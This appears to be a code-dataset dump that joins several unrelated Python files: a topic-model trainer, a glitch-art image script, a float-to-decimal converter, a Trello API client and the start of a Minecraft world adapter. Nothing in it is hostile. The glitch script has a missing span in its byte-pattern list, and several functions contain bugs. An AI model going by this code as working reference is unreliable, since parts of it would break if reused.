-(self.wordTopicCounts - self.topicCounts/Z * np.exp(bg_topicword))\n\n return res, dtopicWords.flatten()\n\n def sumZ(self):\n bg_topicword = np.expand_dims(self.backgroundWords, 1) + self.topicWords\n Z = np.sum(np.exp(bg_topicword), axis=0)\n return Z\n\n def normalizeTopicWords(self):\n av_topic = np.mean(self.topicWords, axis=1)\n self.topicWords -= np.expand_dims(av_topic,1)\n self.backgroundWords = av_topic\n\n def get_norm_grad(self, module, norm_type=2):\n total_norm = 0\n for name, param in module.named_parameters():\n if param.grad is not None:\n total_norm += torch.sum(torch.pow(param.grad.view(-1),2))\n return torch.sqrt(total_norm)\n\n\n def clear_grad_pad(self):\n grad = self.embedding.weight.grad\n grad[0] = torch.zeros_like(grad[0])\n\n def initFunc(self):\n for batch_i, doc_features in enumerate(tqdm(\n self.train_loader, desc='Batch', ncols=80, leave=False)):\n _xb, _yb, corpus_idb = doc_features\n for b in range(self.config.batch_size):\n _x, _y, corpus_id = _xb[b,:,:], _yb[b,:], corpus_idb[b]\n cor_x = _x.squeeze_(0).numpy()\n corpus_id = np.asscalar(corpus_id.numpy())\n if corpus_id not in self.wordTopics:\n self.wordTopics[corpus_id] = dict()\n for doc_id, doc_x in enumerate(cor_x):\n self.wordTopics[corpus_id][doc_id] = dict()\n doc_x_clean = [w for w in doc_x if w not in self.stopword]\n temp = np.random.choice(range(self.config.topic_size), len(doc_x_clean))\n self.wordTopics[corpus_id][doc_id] = temp\n for wp, wi_0 in enumerate(doc_x_clean):\n wi = wi_0 - 1\n self.wordTopicCounts[wi, temp[wp]] += 1\n self.topicCounts[temp[wp]] += 1\n\n\n def train_rnn(self, maxiter=1):\n kl_list = []\n nllk_list = []\n total_loss_value = []\n sp_list = []\n for batch_i, doc_features in enumerate(tqdm(\n self.train_loader, desc='Batch-RNN', ncols=80, leave=False)):\n\n self._zero_grads()\n\n _x, _y, corpus_id = doc_features\n corpus_id = corpus_id.numpy()\n var_x_ = Variable(_x, requires_grad=False)\n var_y = Variable(_y, requires_grad=False)\n # [b_len x s_len x w_len]\n var_x = torch.squeeze(var_x_, 0)\n # emb_x = self.embedding(var_x).reshape(-1, var_x.shape[-1], self.config.input_size).transpose(0, 1)\n # sen_x = self.rnn_w(emb_x).reshape(var_x.shape[0], var_x.shape[1], -1).transpose(0,1)\n emb_x = self.embedding(var_x)\n sen_x = torch.sum(emb_x, 2).transpose(0, 1)\n # sen_x = torch.unsqueeze(sen_x_, 1)\n # [len x batch x wdim]\n zQ, kl_seq = self.vrnn(self.prob_q, self.prob_p,\n sen_x, self.config,\n self.Q_mu, self.Q_var, self.P_mu, self.P_var, self.topicemb)\n inv_var_x = Variable(torch.LongTensor(np.asarray(var_x.numpy()[:,:,::-1],dtype=float).transpose(1,0,-1)), requires_grad=False)\n\n Q = nn.Softmax(dim=-1)(zQ)\n sloss_lst = []\n for s in range(zQ.shape[0]):\n sprob = self.dLSTM(self.topicemb, self.embedding, Q[s], inv_var_x[s])\n sloss = torch.mean(torch.sum(sprob,-1))\n sloss_lst.append(sloss)\n\n # Sampling Z\n # Q = nn.Softmax(dim=-1)(zQ * self.kappa)\n # np_Q = zQ.data.numpy()\n # np_Q = np.squeeze(np_Q, 1)\n # topicCorpus = []\n # for b in range(Q.shape[1]):\n # cor_x = _x[b].numpy()\n # mask = np.zeros([cor_x.shape[0],self.config.topic_size])\n # for doc_id, doc_x in enumerate(cor_x):\n # topics = self.wordTopics[np.asscalar(corpus_id[b])][doc_id]\n # if len(topics)>0:\n # countTopic = np.zeros(self.config.topic_size)\n # # for wp, wi in enumerate(doc_x[doc_x!=0]):\n # doc_x_clean = [w for w in doc_x if w not in self.stopword]\n # for wp, _ in enumerate(doc_x_clean):\n # countTopic[topics[wp]] += 1\n #\n # # concat all topics-count\n # # countTopicList.append(countTopic)\n # mask[doc_id] = countTopic\n #\n # countTopicList = np.expand_dims(mask, 1)\n # topicCorpus.append(countTopicList)\n #\n # topicCorpus = Variable(torch.FloatTensor(np.concatenate(topicCorpus,1)),\n # requires_grad=False)\n pQ = torch.log(Q)\n llk = sum(sloss_lst)\n kl_loss = torch.mean(torch.sum(kl_seq,0))\n sp = torch.mean(torch.sum(torch.sum(pQ,-1),0))*0.\n\n batch_loss = -llk + kl_loss -sp\n\n batch_loss.backward(retain_graph=True)\n # self.clear_grad_pad()\n# torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.config.clip)\n# torch.nn.utils.clip_grad_norm_(self.topicemb.data, self.config.clip)\n self.optimizer.step()\n\n # print(torch.sqrt(torch.sum(torch.pow(self.topicemb.grad.view(-1),2))))\n\n total_loss_value.append(batch_loss.data.numpy())\n nllk_list.append(-llk.data.numpy())\n kl_list.append(kl_loss.data.numpy())\n sp_list.append(-sp.data.numpy())\n\n argmax = torch.argmax(Q[:,-1,:], -1)\n print('\\n-Doc: {}'.format(corpus_id[-1]))\n print(argmax.data.numpy().flatten())\n\n return total_loss_value, nllk_list, kl_list, sp_list\n\n def sample_Z(self, sample=False):\n # sZ = self.sumZ()\n for batch_i, doc_features in enumerate(tqdm(\n self.train_loader, desc='Batch-TM', ncols=80, leave=False)):\n\n _x, _y, corpus_idb = doc_features\n corpus_idb = corpus_idb.numpy()\n var_x_ = Variable(_x, requires_grad=False)\n var_y = Variable(_y, requires_grad=False)\n # [s_len x w_len]\n var_x = torch.squeeze(var_x_, 0)\n emb_x = self.embedding(var_x).reshape(-1,var_x.shape[-1], self.config.input_size).transpose_(0, 1)\n sen_x = self.rnn_w(emb_x).reshape(var_x.shape[1], var_x.shape[0],-1)\n # sen_x = torch.unsqueeze(sen_x_, 1)\n # [len x batch x nTopic]\n zQ, _ = self.vrnn(self.prob_q, self.prob_p, sen_x, self.config,\n self.Q_mu, self.Q_var, self.P_mu, self.P_var)\n\n # calculate all losses\n # kl_loss = self.config.kl_reg*self.KLDist2DistBuck(Q,P)\n\n # kl_loss = torch.sum(kl_seq)\n # kl_list.append(kl_loss.data.numpy())\n\n # llk = self.logLK(var_x,Q,stop_tensor)\n # entro_loss = self.config.entropy_reg*self.entropy_loss(P,Q)\n # entro_topic = self.entropy_topic()\n\n # Sampling Z\n # Q = nn.Softmax(dim=-1)(zQ*self.kappa)\n np_Q = zQ.data.numpy()\n # np_Q = np.squeeze(np_Q, 1)\n cor_x = _x.squeeze_(0).numpy()\n\n for b in range(cor_x.shape[0]):\n corpus_id = np.asscalar(corpus_idb[b])\n if corpus_id==217:\n print('..')\n for doc_id, doc_x in enumerate(cor_x[b]):\n topics = self.wordTopics[corpus_id][doc_id]\n if len(topics) >0:\n countTopic = np.zeros(self.config.topic_size)\n # for wp, wi in enumerate(doc_x[doc_x!=0]):\n doc_x_clean = [w for w in doc_x if w not in self.stopword]\n for wp, wi_0 in enumerate(doc_x_clean):\n wi = wi_0 - 1\n topicScores = np.zeros(self.config.topic_size)\n\n for k in range(self.config.topic_size):\n # topicScores[k] = np.exp(self.kappa * np_Q[doc_id, k]\n # + self.backgroundWords[wi] + self.topicWords[wi, k])/sZ[k]\n topicScores[k] = np.exp(self.kappa * np_Q[doc_id,b, k]\n + self.backgroundWords[wi] + self.topicWords[wi, k])\n\n topicScores = topicScores / np.sum(topicScores)\n # sampling Z_wp\n if sample:\n mul_drawn = np.random.multinomial(1, topicScores)\n else:\n mul_drawn = np.zeros_like(topicScores)\n mul_drawn[np.argmax(topicScores)] = 1\n\n # countTopic += mul_drawn\n newTopic = np.where(mul_drawn == 1)[0][0]\n if newTopic != topics[wp]:\n t = topics[wp]\n self.wordTopicCounts[wi, t] -= 1\n self.wordTopicCounts[wi, newTopic] += 1\n self.topicCounts[t] -= 1\n self.topicCounts[newTopic] += 1\n topics[wp] = newTopic\n\n\n def train(self):\n print('***Init all variables ...')\n # self.initFunc()\n\n print('***Start training ...')\n # stop_tensor = Variable(torch.LongTensor(stopword), requires_grad=False)\n\n for epoch_i in trange(self.config.n_epoch, desc='Epoch', ncols=80):\n # total_loss = []\n # kl_list = []\n # nllk_list = []\n # total_loss_value = []\n # entropy_loss_list = []\n # entropy_topic_list = []\n # self._zero_grads()\n\n # _maxiter_ = 1\n # for _ in range(_maxiter_):\n # self.sample_Z()\n # # for _ in range(_maxiter_):\n # for batch_i, doc_features in enumerate(tqdm(\n # self.train_loader, desc='Batch-TM', ncols=80, leave=False)):\n #\n # _x, _y, corpus_id = doc_features\n # corpus_id = corpus_id.numpy()[0]\n # var_x_ = Variable(_x,requires_grad=False)\n # var_y = Variable(_y,requires_grad=False)\n # # [s_len x w_len]\n # var_x = torch.squeeze(var_x_,0)\n # emb_x = self.embedding(var_x).transpose_(0,1)\n # sen_x_ = self.rnn_w(emb_x)[-1,:,:]\n # sen_x = torch.unsqueeze(sen_x_, 1)\n # # [len x batch x nTopic]\n # zQ, _ = self.vrnn(self.prob_q, self.prob_p, sen_x, self.config,\n # self.Q_mu, self.Q_var, self.P_mu, self.P_var)\n #\n # # calculate all losses\n # # kl_loss = self.config.kl_reg*self.KLDist2DistBuck(Q,P)\n #\n # # kl_loss = torch.sum(kl_seq)\n # # kl_list.append(kl_loss.data.numpy())\n #\n # # llk = self.logLK(var_x,Q,stop_tensor)\n # # entro_loss = self.config.entropy_reg*self.entropy_loss(P,Q)\n # # entro_topic = self.entropy_topic()\n #\n # # Sampling Z\n # # Q = nn.Softmax(dim=-1)(zQ*self.kappa)\n # np_Q = zQ.data.numpy()\n # np_Q = np.squeeze(np_Q,1)\n # cor_x = _x.squeeze_(0).numpy()\n # countTopicList = []\n #\n # for doc_id, doc_x in enumerate(cor_x):\n # topics = self.wordTopics[corpus_id][doc_id]\n # countTopic = np.zeros(self.config.topic_size)\n # # for wp, wi in enumerate(doc_x[doc_x!=0]):\n # doc_x_clean = [w for w in doc_x if w not in self.stopword]\n # for wp, wi_0 in enumerate(doc_x_clean):\n # wi = wi_0-1\n # topicScores = np.zeros(self.config.topic_size)\n # for k in range(self.config.topic_size):\n # topicScores[k] = np.exp(self.kappa * np_Q[doc_id,k]\n # + self.backgroundWords[wi] + self.topicWords[wi,k])\n #\n # topicScores = topicScores/np.sum(topicScores)\n # # sampling Z_wp\n # mul_drawn = np.random.multinomial(1,topicScores)\n # # countTopic += mul_drawn\n # newTopic = np.where(mul_drawn==1)[0][0]\n # if newTopic != topics[wp]:\n # t = topics[wp]\n # self.wordTopicCounts[wi,t]-=1\n # self.wordTopicCounts[wi,newTopic]+=1\n # self.topicCounts[t]-=1\n # self.topicCounts[newTopic] +=1\n # topics[wp] = newTopic\n # concat all topics-count\n # countTopicList.append(countTopic)\n\n # countTopicList = Variable(torch.FloatTensor(np.expand_dims(np.stack(countTopicList),1)), requires_grad=False)\n # pQ = torch.log(Q)\n # llk = torch.sum(torch.sum(countTopicList*pQ, -1))\n # batch_loss = -llk + kl_loss\n # total_loss.append(batch_loss)\n # total_loss_value.append(batch_loss.data.numpy())\n # nllk_list.append(-llk.data.numpy())\n\n print('\\n- Topic:')\n self.dLSTM.expose_topic(self.topicemb, self.embedding)\n total_loss_value, nllk_list, kl_list, sp_list = self.train_rnn(maxiter=1)\n\n\n # Update LDA-part by quasi-newton\n # newTopicWords, fvalue, _ = scipy.optimize.fmin_l_bfgs_b(func=self.fn,x0=self.topicWords.flatten(),maxiter=5)\n # self.topicWords = np.reshape(newTopicWords, self.topicWords.shape)\n # self.normalizeTopicWords()\n\n # Backprop NN\n\n # for _loss in total_loss:\n # (sum(total_loss)/len(total_loss)).backward(retain_graph=True)\n # (sum(total_loss)).backward(retain_graph=True)\n # _loss.backward(retain_graph=True)\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.config.clip)\n # self.optimizer.step()\n\n # Save parameters at checkpoint\n if (epoch_i + 1) % self.config.eval_rate == 0:\n self.evaluate(epoch_i + 1)\n if self.config.write_model:\n # save model\n self.save_checkpoint({\n 'epoch': epoch_i + 1,\n 'state_dict': self.model.state_dict(),\n 'total_loss': np.mean(total_loss_value),\n 'optimizer': [self.optimizer.state_dict()],\n 'topic_emb': self.topicemb\n }, filename='./model/chk_point_{}.pth'.format(epoch_i + 1))\n # self.save_checkpoint(self.topicemb, filename='./model/chk_point_topic_{}.pth'.format(epoch_i + 1))\n\n tqdm.write('\\n***Ep-{} | Total_loss: {} | KL: {} | NLLK: {} | Sparsity: {} | NORM: {}'.format(\n epoch_i,np.mean(total_loss_value),np.mean(kl_list),np.mean(nllk_list), np.mean(sp_list),\n self.get_norm_grad(self.model).data\n ))\n\n self.writer.update_parameters(self.model, epoch_i)\n self.writer.update_loss(np.sum(total_loss_value), epoch_i, 'total_loss')\n self.writer.update_loss(np.sum(kl_list), epoch_i, 'kl_loss')\n self.writer.update_loss(np.sum(nllk_list), epoch_i, 'nllk')\n # self.writer.update_loss(fvalue, epoch_i, 'Fn')\n\n\n def evaluate(self, epoch_i):\n def myplot(distr_list, words):\n labels = list(words)\n xs = range(len(labels))\n def format_fn(tick_val, tick_pos):\n if int(tick_val) in xs:\n return labels[int(tick_val)]\n else:\n return ''\n fig, axs = plt.subplots(len(distr_list), 1, sharey=True, figsize=(50,100))\n\n for i in range(len(distr_list)):\n axs[i].xaxis.set_major_formatter(FuncFormatter(format_fn))\n axs[i].xaxis.set_major_locator(MaxNLocator(nbins=50,integer=True))\n # axs[i].xaxis.set_xticks()\n values = list(distr_list[i])\n # axs[0].bar(names, values)\n # axs[1].scatter(names, values)\n axs[i].plot(xs, values)\n fig.suptitle('Categorical Plotting')\n fig.savefig('./Result/fullads/distr-viz-ep{}.eps'.format(epoch_i),format='eps', dpi=1000)\n\n self.model.eval()\n f_vocab = './output/vocab.dat'\n f_out = open('./Result/fullads/distr-view-ep{}.dat'.format(epoch_i), 'w')\n bg_out = open('./Result/fullads/bg-view-ep{}.dat'.format(epoch_i), 'w')\n rev_vocab = dict()\n vocab = []\n with open(f_vocab,'r') as f:\n for line in f:\n wi = line.split('\\t')\n rev_vocab[int(wi[1])]= wi[0]\n vocab.append(wi[0])\n bg_out.write('{}\\t{}\\n'.format(self.backgroundWords[int(wi[1])-1],wi[0]))\n\n bg_out.close()\n w_distr = np.exp(self.topicWords)/np.sum(np.exp(self.topicWords),axis=0)\n nv = w_distr.shape[0]\n nt = w_distr.shape[1]\n\n # plot\n myplot(list(w_distr[:500,:].transpose()), vocab[:500])\n\n for t in range(nt):\n _, sortedvb = zip(*sorted(zip(w_distr[:,t], vocab), reverse=True))\n sortedvb = list(sortedvb)\n newline = ''\n for w in sortedvb:\n newline = newline + '\\t' + w\n f_out.write(newline.strip() + '\\n')\n\n f_out.close()\n self.model.train()\n\n np.savetxt('./Result/fullads/beta-view-ep{}.dat'.format(epoch_i), self.topicWords, delimiter='\\t')\n # np.savetxt('./output/bg-view-ep{}.dat'.format(epoch_i), self.backgroundWords, delimiter='\\t')\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"rnnTM_main.py","file_name":"rnnTM_main.py","file_ext":"py","file_size_in_byte":28126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"419540595","text":"import os\nfrom random import randint\nimport time\nimport random\nimport math\nimport numpy\nimport colorsys\nimport sys\nfrom PIL import Image, ImageOps, ImageChops\nimport logging\nfrom subprocess import call\nimport functools\nimport itertools\nimport os.path\nimport re\nimport StringIO\n\nINPUT_DIR=\"/home/stephen.salmon/art/inputimages/\"\nOUTPUT_DIR=\"/home/stephen.salmon/art/outputimages/\"\n\n\"\"\"\nThe wordpad glitch is a tuple of 2tuples containing\na match and a replacement\n\"\"\"\nWORDPAD_GLITCH = [\n (b'\\x07', b'\\x20'),\n (b'\\x0B',b'\\x0A\\x0D'),\n (b'(? max_oc:\n (max_oc, most_pres) = c\n return most_pres\n except TypeError:\n raise Exception(\"too many colors in the image\")\n \n def get_avg_rgb_per_square(self):\n for coords in self.square_coords:\n avg_rgb = self.get_avg_rgb_color(self.input_img.crop(coords))\n self.avg_rgb_per_square.append(avg_rgb)\n \n def convert_rgb_to_hsv(self, rgb):\n hsv = colorsys.rgb_to_hsv(*rgb)\n return hsv\n \n def get_avg_hsv_per_square(self):\n for rgb_col in self.avg_rgb_per_square:\n avg_hsv= self.convert_rgb_to_hsv(rgb_col)\n self.avg_hsv_per_square.append(avg_hsv)\n \n def convert_rgb_to_lum(self, r,g,b):\n return math.sqrt( .241 * r + .691 * g + .068 * b )\n \n def get_avg_lum_per_square(self):\n for rgb_col in self.avg_rgb_per_square:\n avg_lum = self.convert_rgb_to_lum(*rgb_col)\n self.avg_lum_per_square.append(avg_lum)\n \n def convert_to_step(self,r,g,b, repetitions=1):\n\n lum = math.sqrt( .241 * r + .691 * g + .068 * b )\n h, s, v = colorsys.rgb_to_hsv(r,g,b)\n h2 = int(h * repetitions)\n lum2 = int(lum * repetitions)\n v2 = int(v * repetitions)\n return (h2, lum2, v2)\n \n def get_avg_step_per_square(self, repetitions = 1):\n for rgb_col in self.avg_rgb_per_square:\n avg_step = self.convert_to_step(*rgb_col, repetitions=repetitions)\n self.avg_step_per_square.append(avg_step)\n \n \n def square_sort_image(self, square_size=10, sort_type=\"avg_rgb_per_square\"\n , saved=False, invert=False):\n sq_size = square_size\n self.get_square_coordinates(square_size=sq_size)\n self.get_avg_rgb_per_square() # always need todo this\n \n orig_seq = range(self.total_squares)\n sorting_seq = []\n \n sorted_image = self.input_img.copy()\n \n if sort_type == \"avg_rgb\" :\n myzip = zip(self.avg_rgb_per_square, orig_seq)\n myzip.sort()\n for x in myzip:\n sorting_seq.append(x[1])\n elif sort_type == \"avg_hsv\":\n self.get_avg_hsv_per_square()\n myzip = zip(self.avg_hsv_per_square, orig_seq)\n myzip.sort()\n for x in myzip:\n sorting_seq.append(x[1])\n elif sort_type == \"avg_lum\":\n self.get_avg_lum_per_square()\n myzip = zip(self.avg_lum_per_square, orig_seq)\n myzip.sort()\n for x in myzip:\n sorting_seq.append(x[1])\n elif sort_type == \"avg_step\":\n self.get_avg_step_per_square()\n myzip = zip(self.avg_step_per_square, orig_seq)\n myzip.sort()\n for x in myzip:\n sorting_seq.append(x[1])\n \n sequence_iter = iter(orig_seq)\n \n for num in sorting_seq:\n if num % 2 == 0 and invert == True:\n im = ImageChops.invert(self.input_img.crop(self.square_coords[num]))\n sorted_image_coords=self.square_coords[(sequence_iter.next())]\n else:\n im = self.input_img.crop(self.square_coords[num])\n sorted_image_coords=self.square_coords[(sequence_iter.next())]\n\n sorted_image.paste(im, sorted_image_coords)\n \n return sorted_image\n \n def slice_overlay(self, sorted_splice):\n for coord in range(0, len(self.square_coords), 2):\n im2 = self.input_img.crop(self.square_coords[coord])\n sorted_splice.paste(im2, self.square_coords[coord])\n for coord in range(0, len(self.square_coords), 3):\n im2 = self.input_img.crop(self.square_coords[coord])\n sorted_splice.paste(im2, self.square_coords[coord])\n\n return sorted_splice\n \n def rand_overlay(self, input_img, no_of_rand_squares=2000):\n while no_of_rand_squares > 0:\n rand_coord = random.choice(self.square_coords)\n # print(\"rand coord is\" + str(rand_coord))\n img = self.input_img.crop(rand_coord)\n input_img.paste(img, rand_coord)\n no_of_rand_squares -= 1\n \n return input_img\n \n def stretch(self, input_img, percentage=10, dim=\"height\"):\n '''Function to stretch an image by a percentage'''\n \n p = 1 + ( percentage / 100 )\n \n height, width = input_img.size\n if dim == \"height\":\n input_img = input_img.resize((width,(height*p)), 3)\n elif dim == \"width\":\n input_img = input_img.resize(((width*p),height), 3)\n \n return input_img\n \n def tile(self, input_img, chop=False):\n '''Method to tile and chop a wordpad glitch'''\n \n # create an image 4 times the size of the input image\n # crop out the centre of the image\n \n width, height = input_img.size\n tiled_image = Image.new(\"RGB\", (width*2, height*2), \"white\")\n \n topleft = (0,0,width,height)\n topright = (width,0,width*2, height)\n bottomleft = (0,height,width,height*2)\n bottomright = (width, height, width*2, height*2)\n\n tiled_image.paste(input_img.copy(),topleft)\n tiled_image.paste(input_img.copy(),topright)\n tiled_image.paste(input_img.copy(),bottomleft)\n tiled_image.paste(input_img.copy(),bottomright)\n \n crop_centre_coords = (int(width/2),int(height/2),int(width*1.5),int(height*1.5))\n \n if chop == True:\n tiled_image = tiled_image.crop(crop_centre_coords)\n \n return tiled_image\n \n def save_me(self, format=\"tif\"):\n pass\n \n##########################################################################\n## Justins Functions\ndef file_read(path, options='rb'):\n with open(path, options) as rh:\n return rh.read()\n \ndef file_write(path, content, options='wb'):\n with open(path, options) as wh:\n wh.write(content)\n \ndef str_io(content=''):\n io = StringIO.StringIO(content)\n io.seek(0)\n return io\n\ndef convert(fh, format='jpeg'):\n img = Image.open(fh)\n wh = str_io()\n img.save(wh, format=format)\n wh.seek(0)\n return wh\n\ndef replace(img, replacements=()): \n ''' Do any kind of replacement , experiment with patterns\n '''\n for pattern, replacement in replacements:\n img = pattern.sub(replacement, img)\n return img \n\nwordpad_replacer = functools.partial(replace, replacements=_WORDPAD_GLITCH) \n\ndef wordpad(infile, outfile):\n image = convert(str_io(file_read(infile)), 'bmp')\n # need to parse the header from the bmp file\n header = image.read(16 + 24)\n # perform the glitch\n glitched = str_io(header + wordpad_replacer(image.read()))\n # convert the image to a jpeg\n output = convert(glitched, 'jpeg')\n file_write(outfile, output.read())\n\n############################################################################\n \nif __name__ == '__main__':\n input_image_name=\"too.jpg\"\n image_path = os.path.join(INPUT_DIR, input_image_name)\n g_img = glitchChops(Image.open(image_path))\n stretched_img = g_img.tile(g_img.input_img)\n stretched_img.show()\n stretched_img.save(OUTPUT_DIR+\"tile_stretch.jpg\")\n #g_img.get_strip_coordinates()\n #sorted_img = g_img.square_sort_image(square_size=20, saved=True, sort_type=\"avg_rgb\")\n #sorted_img.show()\n# slice_over = g_img.slice_overlay(sorted_img)\n# img2 = g_img.rand_overlay(slice_over)\n# img2.show()\n# img2.save(OUTPUT_DIR+\"testsave.tif\")\n# g_img2 = glitchChops(Image.open(OUTPUT_DIR+\"testsave.tif\"))\n# sorted_img = g_img2.square_sort_image(square_size=20, saved=True, sort_type=\"avg_step\")\n# sorted_img.show()\n \n \n# Create a functions to save.. use justins read + write methods\n \n# if saved==True:\n# input_fn = os.path.basename(self.input_file_path)\n# fn = input_fn + time.strftime(\"%Y%m%d-%H%M%s\") + \".tif\"\n# output_fn = os.path.join(OUTPUT_DIR,fn)\n# sorted_image.save(output_fn)\n# self.last_saved_path = output_fn\n \n\n ","sub_path":"laptop_backup/liclipse python images stuff/imagestuff/GlitchChops/glitch_chops.py","file_name":"glitch_chops.py","file_ext":"py","file_size_in_byte":13623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"409784173","text":"def get_input():\n a_input = input(\"Ingresa el número: \")\n return a_input\n\n\ndef bin_to_base(bit_string, base):\n res = 0\n bit_string = bit_string[::-1]\n for pos in range(len(bit_string)):\n res += int(bit_string[pos]) * (base ** pos)\n return res\n\n\ndef det_first_term(input_bits):\n sign = input_bits[0]\n first_term = (-1) ** int(sign)\n return first_term\n\n\ndef det_second_term(input_bits):\n epsilon = 127\n exponent = bin_to_base(input_bits[1:9], 2)\n second_term = 2 ** (exponent - epsilon)\n return second_term\n\n\ndef det_third_term(input_bits):\n third_term = 0\n mantissa = \"1\" + input_bits[9:]\n for num in range(len(mantissa)):\n third_term += int(mantissa[num]) / (2 ** num)\n return third_term\n\n\ndef to_decimal():\n input_num = get_input()\n dec_first_term = det_first_term(input_num)\n dec_second_term = det_second_term(input_num)\n dec_third_term = det_third_term(input_num)\n dec_number = dec_first_term * dec_second_term * dec_third_term\n return dec_number\n","sub_path":"Floating_Point/fp_to_dec.py","file_name":"fp_to_dec.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"219783884","text":"import os \nimport requests, datetime, json\n\nclass TrelloCard:\n def __init__(self, id, name, idList, due_date, description, modified):\n self.id = id\n self.name = name\n self.idList = idList\n self.due_date = due_date\n self.description = description\n self.modified = modified\n \n def get_date(self):\n return datetime.datetime.strftime(self.due_date, '%Y-%m-%d')\n \n def get_user_date(self):\n return datetime.datetime.strftime(self.due_date, '%d/%m/%Y')\n\n def get_modified_date(self):\n return datetime.datetime.strftime(self.modified, '%Y-%m-%d')\n \n def get_modified_user_date(self):\n return datetime.datetime.strftime(self.modified, '%d/%m/%Y')\n\nclass ViewModel:\n def __init__(self, items, lists):\n self._items = items\n self._lists = lists\n\n @property\n def items(self):\n return self._items\n\n @property\n def lists(self):\n return self._lists\n\n @property\n def items_todo(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['ToDo']:\n items.append(item)\n return items\n\n @property\n def items_inprogress(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['InProgress']:\n items.append(item)\n return items\n\n @property\n def items_completed(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['Completed']:\n items.append(item)\n return items\n\n @property\n def recent_completed_items(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['Completed'] and item.modified == datetime.date.today():\n items.append(item)\n return items\n\n @property\n def older_completed_items(self):\n items = []\n for item in self._items:\n if item.idList == self.lists['Completed'] and item.modified != datetime.date.today():\n items.append(item)\n return items\n\ndef get_trello_credentials():\n auth_cred = []\n auth_cred.append(os.getenv('TRELLO_API_KEY'))\n auth_cred.append(os.getenv('TRELLO_API_TOKEN'))\n\n return auth_cred\n\ndef get_trello_board_id():\n board_id = os.getenv('TRELLO_API_BOARD_ID')\n return board_id\n\ndef get_trello_lists_on_board():\n trello_auth_cred = get_trello_credentials()\n trello_board_id = get_trello_board_id()\n getalllistsparams = {'key': trello_auth_cred[0], 'token': trello_auth_cred[1]}\n response = requests.get(f'https://api.trello.com/1/boards/{trello_board_id}/lists', params=getalllistsparams)\n all_lists = response.json()\n\n return all_lists\n\n\ndef get_trello_list_id(list_name):\n trello_auth_cred = get_trello_credentials()\n trello_board_id = get_trello_board_id()\n response = requests.get(f'https://api.trello.com/1/boards/{trello_board_id}/lists?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}')\n \n all_lists = response.json()\n\n for i in all_lists:\n if i['name'] == list_name:\n list_id = i['id']\n \n return list_id\n\ndef get_trello_cards():\n trello_auth_cred = get_trello_credentials()\n trello_board_id = get_trello_board_id()\n response = requests.get(f'https://api.trello.com/1/boards/{trello_board_id}/cards?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}')\n \n card_list = []\n for card in response.json():\n if card['due'] == None:\n due_date = datetime.datetime.strftime(datetime.datetime.today() + datetime.timedelta(365), '%Y-%m-%dT%H:%M:%S.%fZ')\n\n else:\n due_date = card['due']\n\n card_list.append(TrelloCard(card['id'], card['name'], card['idList'], datetime.datetime.strptime(due_date, '%Y-%m-%dT%H:%M:%S.%fZ'), card['desc'], datetime.datetime.strptime(card['dateLastActivity'], '%Y-%m-%dT%H:%M:%S.%fZ').date()))\n \n return card_list\n\ndef get_trello_card_list(listid):\n trello_auth_cred = get_trello_credentials()\n lists = get_trello_lists_on_board()\n for _list in lists:\n if _list['id'] == listid:\n required_list_id = _list['id']\n response = requests.get(f'https://api.trello.com/1/lists/{required_list_id}/cards?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}')\n\n card_list = []\n for card in response.json():\n existing_card = TrelloCard(card['id'], card['name'], card['idList'])\n\n card_list.append(existing_card)\n\n return card_list\n\ndef move_trello_card(card_id, new_list_id):\n trello_auth_cred = get_trello_credentials()\n requests.put(f'https://api.trello.com/1/cards/{card_id}?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}&idList={new_list_id}')\n\ndef create_trello_card(new_card):\n trello_auth_cred = get_trello_credentials()\n trello_list_id = get_trello_list_id(\"To Do\")\n requests.post(f'https://api.trello.com/1/cards/?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}&idList={new_card.idList}&name={new_card.name}&desc={new_card.description}&due={new_card.get_date()}')\n\n\ndef delete_trello_card(card_id):\n trello_auth_cred = get_trello_credentials()\n requests.delete(f'https://api.trello.com/1/cards/{card_id}?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}&closed=true')\n\ndef create_trello_board(board_name):\n trello_auth_cred = get_trello_credentials()\n response = requests.post(f'https://api.trello.com/1/boards/?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}&name={board_name}')\n new_board = response.json()\n return new_board['id']\n\ndef delete_trello_board(board_id):\n trello_auth_cred = get_trello_credentials()\n requests.delete(f'https://api.trello.com/1/boards/{board_id}/?key={trello_auth_cred[0]}&token={trello_auth_cred[1]}')\n \n \n\n","sub_path":"todo_app/data/trello_items.py","file_name":"trello_items.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"174951615","text":"from micropsi_core.world.worldadapter import WorldAdapter\nfrom micropsi_core import tools\nimport random\nimport logging\nimport time\nfrom functools import partial\nfrom math import sqrt, radians, cos, sin\nfrom spock.mcp.mcpacket import Packet\n\n\nclass MinecraftGraphLocomotion(WorldAdapter):\n\n supported_datasources = [\n 'fov_x', # fovea sensors receive their input from the fovea actors\n 'fov_y',\n 'fov_hist__-01', # these names must be the most commonly observed block types\n 'fov_hist__000',\n 'fov_hist__001',\n 'fov_hist__002',\n 'fov_hist__003',\n 'fov_hist__004',\n 'fov_hist__009',\n 'fov_hist__012',\n 'fov_hist__017',\n 'fov_hist__018',\n 'fov_hist__020',\n 'fov_hist__026',\n 'fov_hist__031',\n 'fov_hist__064',\n 'fov_hist__106',\n 'health',\n 'food',\n 'temperature',\n 'food_supply',\n 'fatigue',\n 'hack_situation',\n 'hack_decay_factor'\n ]\n\n supported_datatargets = [\n 'orientation',\n 'take_exit_one',\n 'take_exit_two',\n 'take_exit_three',\n 'fov_x',\n 'fov_y',\n 'eat',\n 